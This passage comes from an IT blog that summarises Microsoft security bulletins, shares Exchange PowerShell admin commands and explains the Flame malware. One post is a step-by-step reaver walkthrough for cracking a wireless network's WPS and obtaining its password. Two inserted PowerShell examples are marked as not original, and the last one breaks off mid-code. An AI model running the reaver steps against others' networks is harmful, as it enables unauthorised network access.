    · For Windows Server 2008 R2 Itanium
    MS11-042:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-043:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-037:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2) *
    · For Windows Server 2008 x64 (w/SP2) *
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64 *
    · For Windows Server 2008 R2 Itanium
    * Note: Server Core installations not affected.
    MS11-046:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-047:
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    MS11-048:
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-051:
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 R2 x64
    Status:
    Microsoft has released patches correcting these issues.
    References:
    · Microsoft Security Bulletin MS11-037
    · Microsoft Security Bulletin MS11-038
    · Microsoft Security Bulletin MS11-039
    · Microsoft Security Bulletin MS11-041
    · Microsoft Security Bulletin MS11-042
    · Microsoft Security Bulletin MS11-043
    · Microsoft Security Bulletin MS11-044
    · Microsoft Security Bulletin MS11-046
    · Microsoft Security Bulletin MS11-047
    · Microsoft Security Bulletin MS11-048
    · Microsoft Security Bulletin MS11-051
  11. Ioannis Zontos
    · These vulnerabilities affect: All current versions of Windows and components that ship with it
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted wireless Bluetooth traffic
    · Impact: An attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Today, Microsoft released three security bulletins describing 21 vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could wirelessly exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity (according to Microsoft's summary).
    · MS11-053: Bluetooth Stack Code Execution Vulnerability
    Bluetooth is an open wireless technology and standard for transmitting data over short distances. The Bluetooth stack that ships with more recent versions of Windows suffers from a code execution vulnerability involving how it accesses memory that hasn't been deleted or initialized. By wirelessly sending a series of specially crafted Bluetooth packets, an attacker could leverage this flaw to gain complete control of your vulnerable computers. However, an attacker would need to remain in Bluetooth range to carry out this attack. The average range of Bluetooth varies from 5 to 100 meters. However, using special gear, Bluetooth "Snipers" have extended the range up to a kilometer. This flaw only affects Windows Vista and 7.
    Microsoft rating: Critical
    · MS11-054: 15 Kernel-Mode Driver Elevation of Privilege Flaws
    The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) which handles many kernel-level devices. This kernel-mode driver suffers from 15 elevation of privilege (EoP) vulnerabilities. The flaws all differ technically, but generally share the same scope and impact. By running a specially crafted program, a local attacker could leverage these flaws to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.
    Microsoft rating: Important
    · MS11-056: CSRSS Local Elevation of Privilege Vulnerability
    The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. It suffers from five technically different, but functionally similar, Elevation of Privilege (EoP) vulnerabilities. Like the Kernel-Mode Driver flaw above, by running a specially crafted program, an authenticated attacker could leverage these flaws to gain complete, SYSTEM-level control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of these flaws.
    Microsoft rating: Important
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-053:
    · For Windows Vista w/SP1
    · For Windows Vista w/SP2
    · For Windows Vista x64 w/SP1
    · For Windows Vista x64 w/SP2
    · For Windows 7
    · For Windows 7 x64
    * Note: Windows Vista SP1 is only affected if you install the optional Feature Pack for Wireless
    MS11-054:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-056:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    Status:
    Microsoft has released patches correcting these issues.
    References:
    · Microsoft Security Bulletin MS11-053
    · Microsoft Security Bulletin MS11-054
    · Microsoft Security Bulletin MS11-056
  12. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: Most current versions of Excel, which ships with Microsoft Office
    · How an attacker exploits it: By enticing one of your users to open a malicious Excel document
    · Impact: In the worst case, an attacker executes code on your user's computer, gaining complete control of it
    · What to do: Install Microsoft Office updates as soon as possible, or let Microsoft's automatic update do it for you

    Exposure:
    As part of today's Patch Day, Microsoft released a security bulletin describing eight vulnerabilities found in Excel -- part of Microsoft Office for Windows and Mac. The flaws also affect some of the Office document viewer and converter applications.
    Though the eight vulnerabilities differ technically, they share the same scope and impact. If an attacker can entice one of your users into downloading and opening a maliciously crafted Excel document, he can exploit any of these vulnerabilities to execute code on a victim's computer, usually inheriting that user's level of privileges and permissions. If your user has local administrative privileges, the attacker gains full control of the user's machine.
    Solution Path
    Microsoft has released patches for Office to correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately, or let the Microsoft Automatic Update feature do it for you.
    Excel update for:
    · Office XP w/SP3
    · Office 2003 w/SP3
    · Office 2007 w/SP2
    · Office 2010 32-bit
    · Office 2010 64-bit
    · Office 2004 for Mac
    · Office 2008 for Mac
    · Office for Mac 2011
    · Open XML File Format Converter for Mac
    · Excel Viewer
    · Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats
    Status:
    Microsoft has released Office updates to fix these vulnerabilities.
    References:
    · MS Security Bulletin MS11-045
  13. Ioannis Zontos
    TOP 10: Exchange Server 2010 PowerShell Commands
    In this post you will find commands that help with managing Microsoft Exchange 2010. These are 10 basic commands that help us; in another post we may add a few more.
     
    1. Check Database Availability Group Replication Status
    The status of all copies of Exchange 2010 databases. We also see the content index state.
    Get-MailboxDatabaseCopyStatus

    2. Fix a Failed Content Index
    When we have a failed content index.
    Update-MailboxDatabaseCopy -Identity [id] -CatalogOnly
     
    3. Move a Mailbox in a Batch
    Label mailbox moves with a batch name to keep track of them, both while they are in progress and when clearing them afterward.
    New-MoveRequest -Identity [id] -BatchName [name]
     
    4. Check Move Progress
    All move requests and their statistics.
    Get-MoveRequest | Get-MoveRequestStatistics
     
    4. Clear a Move Request
    In order to move a mailbox after a move request has completed or failed, you need to remove the request which can be done in bulk, individually, or by a batch name.
    Get-MoveRequest | Remove-MoveRequest
    or to remove a batch of requests already labeled...
    Get-MoveRequest -BatchName [name] | Remove-MoveRequest

    5. Determine Unified Messaging Enablement of a User
    Whether a user is enabled for Unified Messaging.
    Get-Mailbox | fl UME*
     
    6. View Queues of all Hub Transport Servers
    The queue status for all HT servers.
    Get-TransportServer | Get-Queue
     
    7. Determine Active Calls on a UM Server
    See if a server is in use before performing a UM service reset, or see the status of a test call.
    Get-UmServer | Get-UMActiveCalls
     
    8. Determine Exchange Server 2010 Service Status
    We check the status after a reboot.
    Get-Service | Where {$_.DisplayName -Like "Microsoft Exchange*"}
     
    9. Get Mailbox Sizes and Sort by Size
    Get-Mailbox | Get-MailboxStatistics | where {$_.ObjectClass -eq "Mailbox"} | Sort-Object TotalItemSize -Descending | ft @{label="User";expression={$_.DisplayName}},@{label="Total Size (MB)";expression={$_.TotalItemSize.Value.ToMB()}},@{label="Items";expression={$_.ItemCount}},@{label="Storage Limit";expression={$_.StorageLimitStatus}} -auto
     
    10. Check Autodiscover Settings
    Get-WebServicesVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-EcpVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-OwaVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-OabVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-ClientAccessServer | fl AutoDiscoverServiceInternalUri
  14. Ioannis Zontos
    On SBS 2008 or SBS 2011 server systems, some services belonging to Microsoft Exchange Server 2007 or Microsoft Exchange Server 2010 may fail to start automatically after a reboot.
    The services that do not start are:
    · Microsoft Exchange Information Store
    · Microsoft Exchange RPC Client Access (SBS 2011 Server Only)
    · Microsoft Exchange Forms Based Authentication (SBS 2011 Server Only)
    In the Event Viewer we will usually see some or all of the following messages:
    Event ID: 1005
    Source: MSExchangeSA
    Category: General
    Type: Error
    Event ID: 2601
    Source: MSExchange ADAccess
    Category: General
    Type: Warning
    Event ID: 1121
    Source: MSExchangeIS
    Category: General
    Type: Error
    Description: Error 0x96e connecting to Microsoft Active Directory.
    Event ID: 5000
    Source: MSExchangeIS
    Category: General
    Type: Error
    Description: Unable to initialize the Microsoft Exchange Information Store service. - Error 0x96e.
    If we try to start the services manually, they start normally. The problem is caused by the fact that the same SBS 2008/2011 server that hosts the Exchange server also hosts the Global Catalog of our domain.
    A solution to this problem is given in the article below:
    KB article published by the Exchange Server team; as you will see, the article offers 4 solutions.
    For SBS, solutions 2 and 3 are recommended as best practice, especially the second.
  15. Ioannis Zontos
    You’ve probably heard about the “Flame” worm. This interesting new piece of malware belongs to a class of attack called an Advanced Persistent Threat (APT), and it’s making headlines worldwide. As a result, many of you may be wondering whether or not this nasty sounding malware will affect your organization. My short answer is, “probably not,” but read on to learn more.
    Let’s start with the basics. Kaspersky Labs was one of the first to discover and analyze the “Flame” worm (Worm.Win32.Flame). According to their analysis so far, Flame is one of the largest and most complex malware samples they have ever seen. As such, they haven’t finished their full investigation of this malware, but here’s a quick summary of what they know so far:
    · Flame is primarily an information stealing toolkit and backdoor trojan, but it also has worm-like capabilities that allow it to spread over local networks and USB storage.
    · Its information stealing capabilities include network sniffing, keystroke logging, screenshot snapping, and even audio recording. It also can collect data about Bluetooth devices in the vicinity.
    · It shares all this stolen data over an encrypted Command and Control (C&C) channel.
    · It is one of the largest pieces of malware Kaspersky has seen, at around 20MB, and it contains over 20 different modules.
    · Its author also created it using a scripting language (Lua) that malware writers don’t typically use.
    · Rather than running as an executable file like typical malware, Flame loads itself as a number of malicious DLL files at boot.
    · Kaspersky believes the author originally created the malware in 2010.
    · Flame is targeted. Its infections seem limited to various organizations in Middle Eastern countries, with a primary focus on Iran. It also does not appear to have spread widely (under 400 known infections).
    All that said, one thing we don’t know yet is how Flame initially infects its victim. Since this is a very targeted attack, I doubt Flame’s initial infection vector is automated in any way, nor launched on a massive scale. Rather, the attackers probably directly target specific organizations, and may even leverage different infection vectors for each target.
    If you add up all these facts, you can probably see why many experts consider Flame an APT attack similar to Stuxnet and Duqu. While none of the researchers analyzing this malware can prove it yet, most suspect that a nation-state actor created the Flame malware for cyber-espionage.
    This brings us back to our original question, “Should I worry about the Flame malware?” Unless you’re an administrator of a state or education related industry in the Middle East, Flame will probably never directly affect you. So, no. I don’t think typical organizations have anything to worry about Flame. Furthermore, now that AV organizations have identified Flame, they have released signatures to detect and remove its known variants.
    More about Flame here
  16. Ioannis Zontos
    A very good article on the security issues that can affect our daily lives and on the dangers that emerge every day. It is certainly worth commenting on; I quote the article in English.

    Las Vegas (CNN) -- If you've seen the 1983 movie "WarGames," in which a young Matthew Broderick accidentally uses computers to bring the world to the edge of "global thermonuclear war," then you have a pretty good idea what hackers and security researchers are super-concerned about these days -- in real life.
    Here at the Black Hat hacker conference at Caesars Palace, computer security experts have shown ways they can use virtual tools to tap into and tamper with all kinds of stuff in the real world, which is the gist of what made "WarGames" so scary.
    No longer limited to the digital domain, hackers -- many of them working for good -- are now targeting prison systems, the power grid and automobiles. They'll target anything with a mini-computer inside of it. These days, that's pretty much everything.
    Researcher Don Bailey pointed out that there's even a pill bottle with a cellular connection, so that it can remind its owner when to take his or her medicine.
    His first thought: "I'm not sure if that's a good idea."
    A computer worm called Stuxnet is the main reason hackers and security types are focusing on these "real-world exploits" right now. While Stuxnet isn't grabbing as many headlines these days as Anonymous and LulzSec -- two hacking groups that have been stealing personal data and taking over big-name websites -- in-the-know security experts and ex-government officials say the idea behind that worm is actually far scarier.
    "The Stuxnet attack is the Rubicon of our future," Cofer Black, the former head of the CIA's Counterterrorism Center, said during a keynote talk here.
    Stuxnet showed, for the first time, that a bit of malicious computer code could control industrial systems. The common wisdom is that the worm, which spread all over the Internet last year, was designed to attack and possibly blow up nuclear facilities in Iran.
    No one knows for sure who wrote that worm, and its powers were never put to use. But the code is out there, and security researchers and hackers are jumping at the chance to study that code and figure out what else it -- or something like it -- could do.
    The examples surfacing at Black Hat and DEF CON, a companion hacker conference attended by 15,000 people, sound like they're pulled from a Hollywood thriller.
    Tiffany Rad, a computer science professor by day, showed that a little-known electronic component in correctional facilities could be hacked and used to throw open all the doors that lock prisoners in their cells.
    "Where there exists a computer, there's still a chance of breaking that computer," said Teague Newman, who worked with Rad on the hack. The two say they have gone to the federal government with their research. They won't publish the exact code someone could use to tap into prison lock systems for fear that such an event would actually occur.
    The prison hack wasn't even that hard, they said. Working in a home basement in Virginia on a budget of $2,000, it took the duo only two hours to figure out and exploit the bug, which attacks a Siemens networking component called a programmable logic controller.
    "It was not difficult," Newman said.
    Siemens is working on a fix, but it won't necessarily come quickly.
    "We need time to go after those vulnerabilities," said a Siemens engineer who asked not to be named because he's not authorized to speak on the record. "It's not like in the IT world where you can quickly create a patch. We are really talking about critical systems here ... so if you create a patch you want to make sure the patch doesn't influence operations and the PLC (the networking component) is still running afterwards as designed."
    Rad and Newman said that company doesn't deserve all the blame. The way prison security systems are networked, and the way employees use them, are also at fault.
    Central computers that control locks should not be hooked up to the Internet, for example, but they often are, the researchers said.
    Other Black Hat speakers discussed the vulnerabilities of electrical grid and water systems, which, theoretically, could be attacked using similar methods. And further attacks focused on holes in cellular networks.
    Again, the targets are real-world, not virtual.
    Bailey of iSEC Partners demonstrated a way to hack into the mobile components on many cars to unlock or start the vehicles with a few texts from his Android phone. But breaking into cars isn't the scary part, Bailey said in an interview.
    "I could care less if I could unlock a car door," he said. "It's cool. It's sexy. But the same system is used to control phone, power, traffic systems. I think that's the real threat."
    As for solutions, Bailey said the problem is the cost and lack of regulation.
    "The issue is not just architecture but its cost," he said. "A lot of the errors and the vulnerabilities I'm seeing (are) in overall architecture. It's all systems -- whether it's your car or your tracking device or your pill bottle or whatever.
    "It's the issue of no regulations, no standards and no one enforcing any semblance of security."
    Security professionals need to step back from the technology and look at how these real-world systems -- from prisons to power plants -- are designed, said Tom Parker, vice president of security services at FusionX, a computer security company.
    "We're making the same mistakes over and over again," he said, adding that these at-risk networking components are doing more than they were designed to do.
    None of the researchers argue that society should stop putting little computers inside everything. Instead, they said, we need to work harder to make those little computers secure. And if we don't, they say, the consequences could be huge.
  17. Ioannis Zontos
    In this article I return with more information on how we can find the password of a wireless LAN and gain access to it with reaver.
    We start with a BackTrack live CD.
    We download the Live DVD from BackTrack's download page and burn a DVD (the same can be done with a USB stick of >= 2 GB).
    Once BackTrack has started, we run
    startx to start the graphical environment
    Then
    Click Applications > Internet > Wicd Network Manager 2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
    Once we have internet access we run
    apt-get update
    apt-get upgrade
    apt-get install reaver

    iwconfig to see the wireless interface

    Now we put the wireless card into monitor mode
    airmon-ng start wlan0
    A new interface, mon0, is created

    We start the scan to find all the wireless networks around us
    airodump-ng wlan0

    Then we start reaver
    reaver -i moninterface -b bssid -vv
    where moninterface is mon0 and the BSSID is the one we are interested in, e.g.
    reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
    When reaver finishes you will see something like this

    To protect ourselves from reaver we have to disable WPS
    Of course it does not work on all access points, and it needs a very strong signal to work
    More about reaver here: Sean Gallagher's excellent post on Ars Technica.
  18. Ioannis Zontos
    In this article we look at how to restore a mailbox that we deleted by mistake, without resorting to a restore from backup.

    When we delete a mailbox, restoring it is very easy in Microsoft Exchange 2007/2010.

    Deleted mailboxes appear under Recipient Configuration > Disconnected Mailbox, but in a large organization this usually does not happen automatically; we have to wait for online maintenance to complete (they can be made visible immediately with PowerShell; the commands follow below).

    How many days Exchange keeps deleted items and deleted mailboxes can be set from the EMC:

    Organization Configuration > Mailbox > Database Management



    We select Properties and then the Limits tab.



    If we want to see the deleted mailboxes immediately and they are not yet listed under Disconnected Mailbox, we go to PowerShell and run:

    · Clean-MailboxDatabase \servername\SGName\Store
    cleans the database of an individual store

    · Get-MailboxDatabase | Clean-MailboxDatabase

    · Get-MailboxDatabase | Where { $_.Server -eq "<servername>" } | Clean-MailboxDatabase
    cleans all the databases in the given information store

    · Get-MailboxDatabase | Where { $_.Name -eq "<DatabaseName>" } | Clean-MailboxDatabase
    cleans the database whose name matches the one given in -eq "<DatabaseName>"

    When the commands complete, we will see the following event IDs in the Event Viewer:



    Event ID 9531 – the Clean-MailboxDatabase process has started
    Event ID 9533 – we see this when the user does not exist in Active Directory or is not Exchange mail-enabled. The mailbox will be removed from the mailbox store when the retention time expires
    Event ID 9535 – the process has completed
    Changes after Service Pack 1

    After SP1 we have a new cmdlet

    Remove-StoreMailbox: useful when we have moved many mailboxes and want to reclaim the space they occupy in the source database, e.g.

    · Remove-StoreMailbox -Database <DatabaseID> -Identity <MailboxID> -MailboxState [Disabled|SoftDeleted]

    If we want to remove the testaccount mailbox from database DB1 after moving it elsewhere (to another database in the organization), we use

    · Remove-StoreMailbox -Database DB1 -Identity testaccount -MailboxState SoftDeleted

    The command to remove all SoftDeleted mailboxes from database DB1 is

    · Get-MailboxStatistics -Database DB1 | where {$_.DisconnectReason -eq "SoftDeleted"} | foreach {Remove-StoreMailbox -Database $_.database -Identity $_.mailboxguid -MailboxState SoftDeleted}

    The new Remove-StoreMailbox cmdlet lets us remove all disconnected mailboxes with a single command (quite useful for large organizations)

    · Get-MailboxStatistics -Database DB1 | Where-Object {$_.DisconnectReason -eq "Disabled"} | ForEach {Remove-StoreMailbox -Database $_.database -Identity $_.mailboxguid -MailboxState Disabled}

    Now we will see the deleted mailboxes under Recipient Configuration > Disconnected Mailbox



    Right-click the mailbox and choose Connect; we see the following options for the mailbox type

    User Mailbox, Room Mailbox, Equipment Mailbox, Linked Mailbox

    After choosing the mailbox type, we click Next and see

    Matching user, which refers to the Active Directory user we will have created, if the user object was also deleted, and which matches the mailbox we want to connect (essentially it tries to match the user's Display Name)

    Our other option is to connect the deleted mailbox to a user in our organization who does not have a mailbox

    We choose Matching user

    We click OK

    Here we can also choose a retention policy and an ActiveSync mailbox policy, if they exist in our organization, and of course we enter an Alias

    Then Next and, as we can see, we are ready to connect the deleted mailbox

    We click Connect

    The system informs us that the task completed, but the changes will be available once Active Directory replication completes!!
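
    A guarded version of the purge commands above, as an added example that is not part of the original post: it lists the disconnected mailboxes on a database and previews the purge with -WhatIf before Remove-StoreMailbox runs, since that cmdlet deletes the mailbox data permanently. The function name Remove-OldDisconnectedMailbox, the database name DB1 and the 30-day threshold are assumptions.

```powershell
# Added example. Run in the Exchange Management Shell (Exchange 2010 SP1 or later).
# Assumptions: function name, database 'DB1' and the 30-day threshold are placeholders.
function Remove-OldDisconnectedMailbox {
    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param(
        [Parameter(Mandatory = $true)][string]$Database,
        [ValidateSet('Disabled', 'SoftDeleted')][string]$MailboxState = 'SoftDeleted',
        [int]$MinimumAgeDays = 30
    )
    $cutoff = (Get-Date).AddDays(-$MinimumAgeDays)

    # Select only mailboxes in the requested state that were disconnected before the cutoff.
    # @() keeps the result an array even when nothing (or one item) matches.
    $candidates = @(Get-MailboxStatistics -Database $Database |
        Where-Object { $_.DisconnectReason -eq $MailboxState -and $_.DisconnectDate -lt $cutoff })

    foreach ($mbx in $candidates) {
        $label = '{0} ({1}), disconnected {2}' -f $mbx.DisplayName, $mbx.MailboxGuid, $mbx.DisconnectDate
        # ShouldProcess returns $false under -WhatIf, so the purge below is skipped in a preview.
        if ($PSCmdlet.ShouldProcess($label, "Remove-StoreMailbox -MailboxState $MailboxState")) {
            Remove-StoreMailbox -Database $Database -Identity $mbx.MailboxGuid `
                -MailboxState $MailboxState -Confirm:$false
        }
    }

    # Return what was selected so the run can be logged or reviewed.
    $candidates | Select-Object DisplayName, MailboxGuid, DisconnectReason, DisconnectDate, TotalItemSize
}

# Preview only: prints one "What if" line per mailbox and deletes nothing.
Remove-OldDisconnectedMailbox -Database 'DB1' -MailboxState SoftDeleted -WhatIf

# The store events listed in the post (9531 started, 9533 no matching user, 9535 completed).
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; Id = 9531, 9533, 9535 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message
```

    Without -WhatIf the function asks for confirmation for each mailbox before it is purged.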




     


  19. Ioannis Zontos
    Severity: High
    Summary:
    · This vulnerability affects: The DNS service that ships with the Server versions of Windows
    · How an attacker exploits it: By sending specially crafted DNS queries
    · Impact: In the worst case, an attacker gains complete control of your DNS server
    · What to do: Deploy the appropriate Windows update immediately, or let Windows Automatic Update do it for you
    Exposure:
    The Server versions of Windows ship with a DNS Server to allow administrators to offer Domain Name System services on their networks.
    In a security bulletin released today as part of Patch Day, Microsoft describes two vulnerabilities that affect the DNS Server that ships with Server versions of Windows. While this is technically a Windows flaw, which we typically include in a combined Windows alert, we feel that it deserves individual attention due to its high severity.
    The worst of the two issues is a remote code execution flaw involving the way the DNS server handles specially crafted Naming Authority Pointer (NAPTR) DNS resource records (RR). By sending a specially crafted NAPTR query to your DNS server, an attacker could exploit this vulnerability to gain complete control of your server. However, the attacker would have to own the malicious domain name, and the authoritative DNS server for that domain name, in order for this attack to succeed. Despite this slight mitigating factor, the DNS server vulnerability poses a serious risk to your network. You should patch your Microsoft DNS servers immediately.
    The DNS Server also suffers from a less serious Denial of Service (DoS) flaw, which an attacker could exploit to cause your DNS server to stop responding. If an attacker can prevent your users from accessing DNS services, they essentially prevent access to the Internet (by making it difficult for users to find resources by name).
    Solution Path:
    Download, test, and deploy the appropriate DNS server patches immediately, or let Windows Automatic Update do it for you.
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 R2 Itanium
    Status:
    Microsoft has released patches to fix this vulnerability
    References:
    · MS Security Bulletin MS11-058
  20. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: SharePoint, SharePoint Foundation, and Visio Viewer 2010, which are all part of Microsoft's Office suite of products
    · How an attacker exploits them: Multiple vectors of attack, including luring your users to a malicious web site or link, and enticing them to open malicious Visio files
    · Impact: In the worst case, an attacker can execute code, potentially gaining complete control of your computer
    · What to do: Install the appropriate SharePoint and Visio patches as soon as you can, or let Windows Update do it for you.
    Exposure:
    Yesterday, Microsoft released two Office-related security bulletins describing eight vulnerabilities found in SharePoint, SharePoint Foundation, and Visio Viewer 2010 -- all part of Microsoft's Office suite of products. Microsoft rates both bulletins as Important. We summarize the bulletins below:
    · MS12-011: Three SharePoint XSS Vulnerabilities
    SharePoint and SharePoint Foundation are Microsoft's web and document collaboration and management platforms. They both suffer from three Cross-Site Scripting vulnerabilities (XSS) that could allow an attacker to elevate his privileges. By enticing one of your users to visit a malicious web page or into clicking a specially crafted link, an attacker could exploit any of these flaws to gain that user's privilege on your SharePoint server. This means the attacker could view or change all the documents which that user could. These flaws only affect the latest 2010 version of SharePoint.
    Microsoft rating: Important.
    · MS12-015: Five Visio Viewer Memory Corruption Vulnerabilities
    Microsoft Visio is a popular diagramming program, which many network administrators use to create network diagrams. Visio Viewer is a free program that anyone can use to view those diagrams. Visio Viewer suffers from five code execution vulnerabilities, all involving the way it handles specially crafted Visio documents. Though the flaws differ technically, they share the same scope and impact. If an attacker can entice one of your users into downloading and opening a maliciously crafted Visio document, he can exploit any of these vulnerabilities to execute code on that user’s computer, inheriting that user’s level of privileges. If your user has local administrative privileges, the attacker gains full control of the user’s machine. These flaws only affect Visio Viewer 2010, not the commercial Visio product.
    Microsoft rating: Important
    Solution Path
    Microsoft has released SharePoint and SharePoint Foundation patches that correct these vulnerabilities. You should download, test, and deploy the appropriate SharePoint patches as soon as you can. If you choose, you can also let Windows Update automatically download and install these updates for you, though we recommend you test server patches before deploying them to production environments.
    The links below take you directly to the “Affected and Non-Affected Software” section for each bulletin, where you will find links for the various updates:
    · MS12-011
    · MS12-015
  21. Ioannis Zontos
    · These vulnerabilities affect: All versions of Microsoft’s .NET Framework
    · How an attacker exploits it: Multiple ways, including sending specially crafted web requests or enticing users to click maliciously crafted links
    · Impact: Various. In the worst case, an attacker can log in to your web application as another user, without having that user’s password
    · What to do: Install the proper .NET Framework update immediately, or let Windows Update do it for you.
    Exposure:
    Last week — following the holiday weekend — Microsoft released a blog post and Security Advisory about a new, publicly disclosed ASP.NET Denial of Service (DoS) vulnerability.
    A few days later, they released an out-of-cycle Security Bulletin fixing that .NET Framework vulnerability, and three others. Whether you manage a public web server with ASP.NET applications, or host such .NET applications internally, we highly recommend you download, test, and deploy the appropriate .NET Framework updates as soon as possible.
     
    Microsoft’s out-of-cycle .NET Framework security bulletin describes four vulnerabilities, including the publicly disclosed DoS vulnerability mentioned above. The vulnerabilities have different scopes and impacts. I detail two of the more relevant issues below, in order of severity:
    · ASP.NET Forms Authentication Bypass Flaw – ASP.NET doesn’t properly authenticate specially crafted usernames. If an attacker has (or can create) an account on your ASP.NET application, and knows the username of a victim, the attacker can send a specially crafted authentication request that gives him access to the victim’s account without needing a valid password. However, your ASP.NET web site or application is only vulnerable to this when you’ve enabled “Forms Authentication.”
    · ASP.NET HashTable Collision DoS Vulnerability – Without going into great technical detail, ASP.NET suffers from a flaw involving the way it hashes specially crafted requests. In short, by sending specially crafted ASP.NET requests to your web application, an attacker can fill ASP.NET’s hash table with colliding hashes, which can greatly degrade the performance of your ASP.NET application or web site. If you are technically inclined, and would like more details, we recommend reading n.run’s advisory concerning this flaw.
    Microsoft’s bulletin also fixes a less severe privilege escalation vulnerability, as well as an insecure URL redirect flaw. For more details on these two flaws, see the “Vulnerability Information” section of Microsoft’s bulletin.
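    The effect described for the hash table collision flaw, shown on a toy hash table as an added example (not code from the bulletin or from ASP.NET): keys that fall into the same bucket turn each insert into a scan of everything stored before it. The hash function, bucket count, key names and the 1000-key cap are assumptions chosen for illustration.

```powershell
# Added illustration: a toy chained hash table, not ASP.NET's implementation.
# Assumptions: polynomial hash with multiplier 31, 1024 buckets, cap of 1000 keys.
function Get-ToyBucket {
    param([string]$Key, [int]$BucketCount)
    $h = 0
    foreach ($ch in $Key.ToCharArray()) { $h = ($h * 31 + [int]$ch) % $BucketCount }
    return $h
}

function Measure-InsertCost {
    # Inserts every key and returns the number of key comparisons performed.
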